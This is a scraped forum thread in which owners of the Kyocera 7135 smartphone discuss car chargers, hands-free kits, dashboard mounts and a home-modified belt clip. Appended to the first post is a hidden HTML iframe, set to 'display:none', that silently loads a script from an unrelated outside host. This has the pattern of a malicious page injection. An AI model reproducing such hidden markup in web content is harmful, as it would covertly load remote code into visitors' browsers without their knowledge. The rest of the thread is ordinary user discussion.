+ Reply to Thread

Thread: Car-Adapters

Car-Adapters

I have a car-adapter handsfree kit that fit the bottom complex jack on my Kyocera 2035a and also fit my 6035 Smartphone. Anyone know if the connection on the 7135 is the same?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

A similar question....anyone aware if CCM has made a "navigator" handsfree for this phone yet. Can't seem to find out how to contact the company directly. This is the handsfree device that plugs into the cigarette lighter and also holds the phone as well.

Larry

should be fine

Here's a link to the car charger as sold at getconnected:
    http://www.getconnected.com/V_Catalo...ail&Prod=19261

(if the link doesn't work just look for "Kyocera lighter charger" on the site)

It says it works with the 2035 and 7135.

I actually just ordered the charger from getconnected for my 7135. It arrived today; is made by Kyocera and the model number on the charger is: TXCLA10004. Juts thought I'd mention it since it may match yours.

thanks...but tha'ts just a regular car charger. I'm looking for the "navigator" type which is a combo charger/holder and seaker phone in one.

oops

oops; sorry; I will read more carefully next time

info?

Larryg, in trying to redeem myself for my dumb response, I searched for and found this:
    http://electronics.cnet.com/electron...0.html?tag=dir

which has an 800 number for CCM (800-928-7696) and a couple email addresses
    General :ccm@ccmcellular.com
    _
    Tech support: support@ccmcellular.com

I didn't check to see if they work. The email addresses may be bogus because the URL www.ccmcellular.com does not work. Maybe the phone number will work.

thanks for your investigatory skills. good news was it was the right phone number. bad new, no plans right now for the 7135. be interested to hear what other people are using to hold their phone in the car.

Was planning on getting the Kyo Car Kit (ordered from Dan's on ebay, and should get it in the next day or so) and am hoping that www.proclipusa.com comes out with a clip for the 7135 soon.

I have been in e-mail contact with someone over there every week or so for the past 6 weeks. Originally (6 weeks ago) she said it was about 4 weeks away...last week, she had no date.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

2235 Car Charger

I lost my 2234 and I want to upgrade to the 7135. Will my old car charger work with the new 7135 or do I need to get another one? What about the power adaptor also?

Kindly,
    Artkazi:drummer :Fro:

Re: 2235 Car Charger

Originally posted by Artkazi
    I lost my 2234 and I want to upgrade to the 7135. Will my old car charger work with the new 7135 or do I need to get another one? What about the power adaptor also?

Kindly,
    Artkazi:drummer :Fro:
    Attached is a document that will tell you what works with what.

Shwemp
    Attached Files

I am experimenting on something interesting with my spare belt clip:
    I took the belt clip and put the phone in backwards, inserting only the rear section (keypad) so that the flip can still open. While the flip cannot be closed entirely, it does so enough to turn the PDA off. The data access ports are easily accessable. I'm thinking of altering the back of the clip in some undecided fashion so that it would be mount onto my car's dash. While this will hold the phone securely, the top locking device on the clip (ever so slightly) hits the external LCD and I am concerned that it could cause damage with prolonged use. Maybe if I shave that down a bit, it won't hit. Then again, it may not hold the phone as well either.
    If I am successful, I will update this forum. If I am not, then I will be out $10 on a belt clip.

Originally posted by GalenMD
    I am experimenting on something interesting with my spare belt clip:
    I took the belt clip and put the phone in backwards, inserting only the rear section (keypad) so that the flip can still open. While the flip cannot be closed entirely, it does so enough to turn the PDA off. The data access ports are easily accessable. I'm thinking of altering the back of the clip in some undecided fashion so that it would be mount onto my car's dash. While this will hold the phone securely, the top locking device on the clip (ever so slightly) hits the external LCD and I am concerned that it could cause damage with prolonged use. Maybe if I shave that down a bit, it won't hit. Then again, it may not hold the phone as well either.
    If I am successful, I will update this forum. If I am not, then I will be out $10 on a belt clip.
    Galen

Check out this tread:

http://www.smartphonesource.com/vbul...&threadid=5857

One of our board-mates did just that. I also ordered an extra belt holder and plan to use it temporarily until ProClipUSA finally comes out with the mount for the 7135, although in mid-Feb they were saying 4-6 weeks. NOW they are saying, uh...well...we expected it by now. So who really knows. The belt clip should suffice for the time being...

Jeff
    Jeff
    Tampa FL

My 7135 Setup

Well, I set up my 7135 in my car and here is what I used:

1. Panavise custom mount for my BMW 530i (you can get a custom panavise mount for almost any car) $20-$30

2. The Kyocera Car Kit that plugs into the lighter (got mine from Kyocera directly, although I think you can get better deals elsewhere)

3. 3M Double sided adhesive squares mounted on the panavise to hold the holder

4. The Unikit By Hirschman. I thought my car accessory guys was giving me a snow job, -- a phone holder that has a built in signal booster -- but you know what? IT WORKED. My signal is at full strength in the car where ever I go. I bought it at a store, but here is a link where you can get it for the same price. By the way, the 7135 fits perfect in here - open or closed - you just push it against the clip and it fits. (score!)

http://cellantenna.com/Antennas/Glas...t_products.htm

I dont have a picture yet, but I will try and post one.

Got my hands free kit in the mail today (from Dan's on ebay.com) and over all I am fairly impressed.

I called my wife on it on the way home and she did not complain at all (she did when I had my StarTac hands free or when I used my Jabra ear-boom).

On my end the volume of the speaker was certainly loud enough, just seemed to distort a little, even at lower volumes.

I did take the unit apart to see what modification opportunites might be available.

What I might want to do is use a different/higher quality speaker...anyone try this/think it's possible???

Should be easy enough to tap into the cigarette lighter for power and then all i need to do is get/make an extension cable for the mic to be able to mount it near the visor.

Again...overall, pretty impressed. All we need now is a CUSTOM 7135 holder...hello proclipusa...do you hear me???

Jeff
    Jeff
    Tampa FL

Re: Re: 2235 Car Charger

Originally posted by shwemp
    Attached is a document that will tell you what works with what.

Shwemp
    The attachment may not be completly accurate. The Travel and Car Chargers for the 6035 and the 7135 have different connectors.

However, the 6035 RS232 Data Cable fits perfectly. The Data Cable has a power socket for the 6035 Travel and Car Power Adapters. When attached, they do power and recharge the 7135 through the Data Cable.

Not perfect, but a very nice backup.

Car Holder

I just finished modifying my extra belt clip. While I only risked loosing a $10 belt clip, it worked great:
    First, I took a lighter and heated-up the middle of the BELT-clip portion itself--just enough to make the plastic pliable. I then bent it back to an almost 90 degree angle. After about 20 seconds, it was cool and stiff again.
    I then took a small saw (or clipper) and cut off the tiny loop on the very tip of the belt-clip.
    Next, I filed down that raw edge to form a nice small wedge.
    The clip then slid perfectly within a seam on my dash.
    The only downside compared to the panavise is that it is not screwed in permanently into the dash. The upside is that it looks great!
    (By the way, I used my old microphone from my Nokia 8200 car kit. It has a very long cord, but I had to cut down the base that holds the pin to make it long enough to fit).
    Here are some pics if anyone is interested.

I deleted the picture due to the accidental exposure of confidential information. I will insert a new picture shortly.

another pic...

Another pic...
    Attached Thumbnails Attached Thumbnails Car-Adapters-p1010084.jpg  

Smooth move GalenMD! Looks great

I'm still trying to mount my Car kit.:p The phone is phase two & I like your idea.
    iPhone therefore iAm.

teh connection for the 7135 is the same for any car kit that you may have for the kyocera phone models...I am referring to the car kit that plugs into the power adapter

referring to where?
    iPhone therefore iAm.